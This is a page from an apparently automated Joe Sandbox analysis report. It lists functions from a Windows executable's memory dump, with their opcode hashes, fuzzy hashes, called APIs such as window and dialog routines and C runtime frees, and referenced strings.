Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3328979b64a186b02c4d8c7b076b1115f5e8311372a80651e45eb05e8c84594
Instruction ID: 869838ffb9c717f6da09f6e021ad8e57e76811085feb5efb57f8291b9e456bdd
Opcode Fuzzy Hash: e3328979b64a186b02c4d8c7b076b1115f5e8311372a80651e45eb05e8c84594
Instruction Fuzzy Hash: 80E147755083948FC315CF6DD88086ABFF0AF8A300F45096EF9C497352C235EA5ADBA6

Function 009F4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 3ef7e47a0458ac10cf591b8a19743bed0798c1a4e5ec0ce76812746580654f75
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: 8D9138B020434E9BDB25EE64D891BFF77D9EBA0304F10092DF79AC7281DA68A945C752

Function 009F43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 0caf60d387493b052d1a4edbc5f767b5ee988e702bee700a30b18a23538fdac8
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 6681397170438A5BDB25EE69C8D1BBF37D4ABD1304F004D2DFB8ACB282DA7499858752

Function 00A051C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1f30ff62f63714f394ef88347d7215a87f70d88427b1b5f4460d2f0ac6d3dc3
Instruction ID: 4e8a81b72d7556d4f5c896c6e0e271720c0b5357bf50dd15d1b564b767773797
Opcode Fuzzy Hash: b1f30ff62f63714f394ef88347d7215a87f70d88427b1b5f4460d2f0ac6d3dc3
Instruction Fuzzy Hash: 96613571E40F0D67DA389B78B9A57FF23A4EF4A340F14091AE542DF2C1D651ED428E16

Function 00A04F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 96c9b5f8ea7e59d7b3587e6b438df79225acb2c4e98f4860eae07409708564df
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: EF5136B0E00F4D5BDB386B7CB56ABBF27D5AB06700F180919E982C72C2C505ED458FA6

Function 009EEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b2e1488ceed444d9825afe97c4bd83a144ecaeeee00c39623c47c82fff887c
Instruction ID: 4c6a6106b77970b98e83f202b65772b1ce1f211263baeef9372c9cfcb563109b
Opcode Fuzzy Hash: 10b2e1488ceed444d9825afe97c4bd83a144ecaeeee00c39623c47c82fff887c
Instruction Fuzzy Hash: F751C23150C3D58FD712CF25C1505AEBFE5AE9A314F4909AAE8D95B243C221DF4ACB62

Function 009F00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289d3b762116f0de04c8a11457841d6c208c0f371b676b0cb79886fe0eca5f39
Instruction ID: 382e9fc58d4eb921200d6c200666a083915a0412bc76eb0b93161f75b7b425fc
Opcode Fuzzy Hash: 289d3b762116f0de04c8a11457841d6c208c0f371b676b0cb79886fe0eca5f39
Instruction Fuzzy Hash: 7551EFB1A083159FC748CF19D48055AF7E1FF88314F058A2EE899E3341DB34EA59CB9A

Function 009F3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: f56287991eb6b34e46ae3f6650fe398094c852dd3a7bfd60dd85f2a6c261a1c6
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 2131F6B1A1474A8FCB14DF29C85126EBBE0FB95314F50892DE599C7342C739EE0ACB91

Function 009EE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 009EE30E

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

Part of subcall function 009F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A21030,00000200,009ED928,00000000,?,00000050,00A21030), ref: 009F1DC4

_strlen.LIBCMT ref: 009EE32F
SetDlgItemTextW.USER32(?,00A1E274,?), ref: 009EE38F
GetWindowRect.USER32(?,?), ref: 009EE3C9
GetClientRect.USER32(?,?), ref: 009EE3D5
GetWindowLongW.USER32(?,000000F0), ref: 009EE475
GetWindowRect.USER32(?,?), ref: 009EE4A2
SetWindowTextW.USER32(?,?), ref: 009EE4DB
GetSystemMetrics.USER32(00000008), ref: 009EE4E3
GetWindow.USER32(?,00000005), ref: 009EE4EE
GetWindowRect.USER32(00000000,?), ref: 009EE51B
GetWindow.USER32(00000000,00000002), ref: 009EE58D

Strings

d, xrefs: 009EE3F5
$%s:, xrefs: 009EE302
CAPTION, xrefs: 009EE4BD

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 4ebce185859f5ce3d2c18f1b8ffb4b872eecf23bd5f273d19ff03849e19639dc
Instruction ID: be0d3ea330364770ba1d3e2a0856d2d112ab7ecf690ad1ddf218e213927b7e50
Opcode Fuzzy Hash: 4ebce185859f5ce3d2c18f1b8ffb4b872eecf23bd5f273d19ff03849e19639dc
Instruction Fuzzy Hash: E981B272208341AFDB11DFA9CD89A6BBBE9FBC9704F04091DFA8497290D631ED058B52

Function 00A0CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00A0CB66

Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C71E
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C730
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C742
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C754
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C766
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C778
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C78A
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C79C
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C7AE
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C7C0
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C7D2
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C7E4
Part of subcall function 00A0C701: _free.LIBCMT ref: 00A0C7F6

_free.LIBCMT ref: 00A0CB5B

Part of subcall function 00A08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34), ref: 00A08DE2
Part of subcall function 00A08DCC: GetLastError.KERNEL32(00A13A34,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34,00A13A34), ref: 00A08DF4

_free.LIBCMT ref: 00A0CB7D
_free.LIBCMT ref: 00A0CB92
_free.LIBCMT ref: 00A0CB9D
_free.LIBCMT ref: 00A0CBBF
_free.LIBCMT ref: 00A0CBD2
_free.LIBCMT ref: 00A0CBE0
_free.LIBCMT ref: 00A0CBEB
_free.LIBCMT ref: 00A0CC23
_free.LIBCMT ref: 00A0CC2A
_free.LIBCMT ref: 00A0CC47
_free.LIBCMT ref: 00A0CC5F

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5f43d31b5adde8762f08b4ccaa3fb86ea6eb434bb2f2676aa7314c65192bf7cd
Instruction ID: fcc5e01f809b3a9c405b508f94885d820299a798f8ecf4e6fcb9209f4e37a53a
Opcode Fuzzy Hash: 5f43d31b5adde8762f08b4ccaa3fb86ea6eb434bb2f2676aa7314c65192bf7cd
Instruction Fuzzy Hash: 12314B3160020E9FEB21AB78F946B5AB7E9AF11320F144629E59DD71D2DF75AC80CB14

Function 009F9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009F9736
_wcslen.LIBCMT ref: 009F97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 009F97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 009F9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009F982D

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 009F9760
</html>, xrefs: 009F97B7
<html>, xrefs: 009F9755, 009F978E
utf-8"></head>, xrefs: 009F976B

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 763feb06d7069780e01ba172efc7d669f0d4d1e3205760c80313926d5858ec69
Instruction ID: f7fdba2657ecec32f1ebcdcc35a78f754f33e9cbbadda5cf10b2a0ecafa80421
Opcode Fuzzy Hash: 763feb06d7069780e01ba172efc7d669f0d4d1e3205760c80313926d5858ec69
Instruction Fuzzy Hash: 4B314A325083097BDB25AF74EC06FBF779CEF82360F14061DF601961D2EB659A4583A5

Function 009FD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 009FD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 009FD6ED

Part of subcall function 009F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,009EC116,00000000,.exe,?,?,00000800,?,?,?,009F8E3C), ref: 009F1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 009FD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 009FD720
GetObjectW.GDI32(00000000,00000018,?), ref: 009FD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 009FD75D
DeleteObject.GDI32(00000000), ref: 009FD764
GetWindow.USER32(00000000,00000002), ref: 009FD76D

Strings

STATIC, xrefs: 009FD6F3

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: db4ffa8bbbd55c34b960371654f685b3d8ecdcec828f527e32137e19ae920b56
Instruction ID: 2aa6b8642d494a6397429f24eda0b5a0b15cdaa31590082ff2e7e962d259fa05
Opcode Fuzzy Hash: db4ffa8bbbd55c34b960371654f685b3d8ecdcec828f527e32137e19ae920b56
Instruction Fuzzy Hash: A11136BB1023187BEA21FBB49C4AFBF765DAFC5701F004210FB41E6091DB658B0643A5

Function 00A096F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A09705

Part of subcall function 00A08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34), ref: 00A08DE2
Part of subcall function 00A08DCC: GetLastError.KERNEL32(00A13A34,?,00A0C896,00A13A34,00000000,00A13A34,00000000,?,00A0C8BD,00A13A34,00000007,00A13A34,?,00A0CCBA,00A13A34,00A13A34), ref: 00A08DF4

_free.LIBCMT ref: 00A09711
_free.LIBCMT ref: 00A0971C
_free.LIBCMT ref: 00A09727
_free.LIBCMT ref: 00A09732
_free.LIBCMT ref: 00A0973D
_free.LIBCMT ref: 00A09748
_free.LIBCMT ref: 00A09753
_free.LIBCMT ref: 00A0975E
_free.LIBCMT ref: 00A0976C

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 23cbbd2fa7fd6e1cbccbff231419b110ce662c0d0e530e88d2bf623ddc4b9d0a
Instruction ID: 74bb7e64b079239075c1bde8eb3f5f6281355794089f7d35706a43d7ddfe7cd5
Opcode Fuzzy Hash: 23cbbd2fa7fd6e1cbccbff231419b110ce662c0d0e530e88d2bf623ddc4b9d0a
Instruction Fuzzy Hash: 5F11B97612010EBFCB01EF54EA42CDD3B75EF14350B5155A1FA488F1A2DE35EE509B88

Function 00A02E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00A02F50
___TypeMatch.LIBVCRUNTIME ref: 00A0305E
_UnwindNestedFrames.LIBCMT ref: 00A031B0
CallUnexpected.LIBVCRUNTIME ref: 00A031CB
_abort.LIBCMT ref: 00A031D0

Strings

csm, xrefs: 00A02E6E
csm, xrefs: 00A02EDB
csm, xrefs: 00A02F87

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: e20a64ba5185a9cb2c12954031b611fcf609fe4586afb4a5235595289ea34520
Instruction ID: 83d10bd68605d694774a23e5990fc863296452c7898378c10deb541eaeeb68ce
Opcode Fuzzy Hash: e20a64ba5185a9cb2c12954031b611fcf609fe4586afb4a5235595289ea34520
Instruction Fuzzy Hash: ACB17F7290020DEFCF25DFA4E985AAEB7B9FF08310F14415AE8056B292D731DA61CB91

Function 009E6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E6FAA
_wcslen.LIBCMT ref: 009E7013
_wcslen.LIBCMT ref: 009E7084

Part of subcall function 009E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 009E7AAB
Part of subcall function 009E7A9C: GetLastError.KERNEL32 ref: 009E7AF1
Part of subcall function 009E7A9C: CloseHandle.KERNEL32(?), ref: 009E7B00

Strings

\??\, xrefs: 009E702B
SeRestorePrivilege, xrefs: 009E6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 009E6FCC
UNC\, xrefs: 009E7051

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 06796e52cd31682bee42658b86b94021ee88996caad8981ced6f366f374d7cfc
Instruction ID: d691b5a62b393aa496ea08b38d275f59ceb175eec3925d55e12c373ddad75588
Opcode Fuzzy Hash: 06796e52cd31682bee42658b86b94021ee88996caad8981ced6f366f374d7cfc
Instruction Fuzzy Hash: 564119B1D083C4BAEF22EBB5AD42FEEB76C9F54304F004455FA55A61C2D674AE848722

Function 009FB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009E1316: GetDlgItem.USER32(00000000,00003021), ref: 009E135A
Part of subcall function 009E1316: SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

EndDialog.USER32(?,00000001), ref: 009FB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 009FB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 009FB650
SetWindowTextW.USER32(?,?), ref: 009FB661
GetDlgItem.USER32(?,00000065), ref: 009FB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 009FB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 009FB694

Strings

LICENSEDLG, xrefs: 009FB5D4

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

